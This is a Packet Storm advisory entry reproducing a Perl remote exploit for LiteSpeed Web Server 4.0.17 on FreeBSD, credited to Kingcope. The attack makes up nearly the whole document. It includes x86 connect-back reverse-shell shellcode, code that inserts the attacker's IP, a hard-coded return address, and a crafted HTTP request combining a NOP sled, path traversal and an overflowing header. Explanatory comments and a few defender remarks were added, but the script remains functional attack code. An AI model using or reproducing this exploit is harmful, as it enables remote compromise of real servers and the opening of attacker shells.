LiteSpeed Web Server 4.0.17 Remote Exploit

2010-12-10T00:00:00
ID PACKETSTORM:96625
Type packetstorm
Reporter Kingcope
Modified 2010-12-10T00:00:00

Description

                                        
# LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD
# bug discovered & exploited by Kingcope  
#  
# Dec 2010  
# Lame Xploit Tested with success on   
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86  
# FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86  
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.15 Standard x86  
# can be used against the admin interface (port 7080), too  
# Xploit only works on default lsphp binary not the compiled version  
#  
# this should be exploitable on linux too (on the compiled SAPI version)  
# the shipped linux version of lsphp has stack cookies enabled,  
# which could be brute forced if there wasn't a null put at the end of  
# the exploit buffer. The compiled SAPI version is exploitable, but then  
# the offsets differ from box to box, so this time FreeBSD targets only.  
# thus on linux this is very tricky to exploit.  
# this is a proof of concept, don't try this on real boxes  
# see lsapilib.c line 1240  
  
use IO::Socket;  
  
$|=1;   # autoflush STDOUT so the server's reply is shown as it is read below  
  
#freebsd reverse shell port 443  
#setup a netcat on this port ^^  
# Fixed x86 machine code for the FreeBSD targets named in the header.  From
# this listing it is an opaque byte string; the author's inline comments are
# the only description of its parts.  The four \x41 ("AAAA") bytes starting
# at offset 37 are a placeholder that the substr() call further down
# overwrites with the packed address resolved from the third argument.
$bsdcbsc =  
# setreuid, no root here  
"\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80".  
# connect back :>  
"\x31\xc0\x31\xdb\x53\xb3\x06\x53".  
"\xb3\x01\x53\xb3\x02\x53\x54\xb0".  
"\x61\xcd\x80\x31\xd2\x52\x52\x68".  
"\x41\x41\x41\x41\x66\x68\x01\xbb".  
"\xb7\x02\x66\x53\x89\xe1\xb2\x10".  
"\x52\x51\x50\x52\x89\xc2\x31\xc0".  
"\xb0\x62\xcd\x80\x31\xdb\x39\xc3".  
"\x74\x06\x31\xc0\xb0\x01\xcd\x80".  
"\x31\xc0\x50\x52\x50\xb0\x5a\xcd".  
"\x80\x31\xc0\x31\xdb\x43\x53\x52".  
"\x50\xb0\x5a\xcd\x80\x31\xc0\x43".  
"\x53\x52\x50\xb0\x5a\xcd\x80\x31".  
"\xc0\x50\x68\x2f\x2f\x73\x68\x68".  
"\x2f\x62\x69\x6e\x89\xe3\x50\x54".  
"\x53\x50\xb0\x3b\xcd\x80\x31\xc0".  
"\xb0\x01\xcd\x80";  
  
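# Print the command-line help text to STDOUT and terminate the process.
# Takes no arguments and never returns (it calls exit).  The empty "()"
# prototype of the original was dropped: prototypes change how calls are
# parsed rather than validating arguments, and the existing call site
# (`usage;`) parses identically without it because the sub is defined first.
sub usage {
    print "written by kingcope\n";
    print "usage:\n".
        "litespeed-remote.pl <target ip/host> <target port> <your ip> <php file on remote host>\n\n".
        "example:\n".
        "perl litespeed-remote.pl 192.168.2.3 8088 192.168.2.2 phpinfo.php\n\n";

    exit;
}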
  
# Exactly four positional arguments are required.  `ne` is the string
# comparison operator; it happens to work on these small integers but `!=`
# is the numeric form.
if ($#ARGV ne 3) { usage; }  
  
# Positional arguments, in the order given by usage(): target host, target
# port, the address the payload should connect back to, and the PHP path
# on the target.
$target = $ARGV[0];  
$port = $ARGV[1];  
$cbip = $ARGV[2];  
$file = $ARGV[3];  
  
# gethostbyname() in scalar context yields the packed 4-byte IPv4 address
# (undef if resolution fails); split(//) breaks it into single bytes.
# Resolution failure is not checked, so the four variables are undef in that
# case and the substr() below would insert an empty string.
($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));  
  
# Overwrite the 4-byte placeholder at offset 37 of $bsdcbsc (the "AAAA"
# bytes in its definition above) with the packed address.
substr($bsdcbsc, 37, 4, $a1 . $a2 . $a3 . $a4);  
  
#my $sock = IO::Socket::INET->new(PeerAddr => $target,  
# PeerPort => 8088,  
# Proto => 'tcp');  
#$a = "A" x 500;  
#print $sock "POST /phpinfo.php HTTP/1.1\r\nHost: 192.168.2.5\r\n\r\n";  
  
#$x = <stdin>;  
  
#$ret = pack("V", 0x28469478); # FreeBSD 7.3-RELEASE  
#$ret = pack("V", 0x82703c0); # FreeBSD 6.3-RELEASE  
# Single hard-coded little-endian return address; the two commented lines
# above are the author's earlier per-release values.  A fixed address like
# this is why the header says the compiled (per-box) builds are not covered.
$ret = pack("V", 0x080F40CD); # JMP EDX lsphp  
  
# No check that the connection succeeded: on failure $sock is undef and the
# print below fails rather than reporting the connect error.
my $sock = IO::Socket::INET->new(PeerAddr => $target,  
PeerPort => $port,  
Proto => 'tcp');  
  
  
# Overlong header value: fixed padding, the return address, then filler.
# NOTE: $a (with $b) is the package variable sort() uses; reusing it as a
# general buffer works here but is a well-known footgun.
$a = "A" x 263 . "AAAA" x 6 . $ret . "C" x 500;  
# 3000 NOP bytes (\x90) followed by the patched payload.
$sc = "\x90" x 3000 . $bsdcbsc;  
  
# One HTTP request carries everything.  From a defender's point of view the
# request is highly anomalous: raw non-printable bytes and a "/../" segment
# in the request path, a multi-kilobyte "VVVV:" header, and an overlong
# header name.  Request-line/header size limits and a WAF or IDS rule on
# non-printable bytes in the path would each reject or flag it; the header
# comment's reference to lsapilib.c line 1240 names the code the author
# says is affected.
print $sock "POST /\x90\x90\x90\x90\x90\x90\xeb\x50/../$file? HTTP/1.1\r\nHost: $target\r\nVVVV: $sc\r\n$a KINGCOPEH4XXU:\r\n\r\n";  
  
# Echo whatever the server sends back until it closes the connection.
while (<$sock>) {  
print;  
}  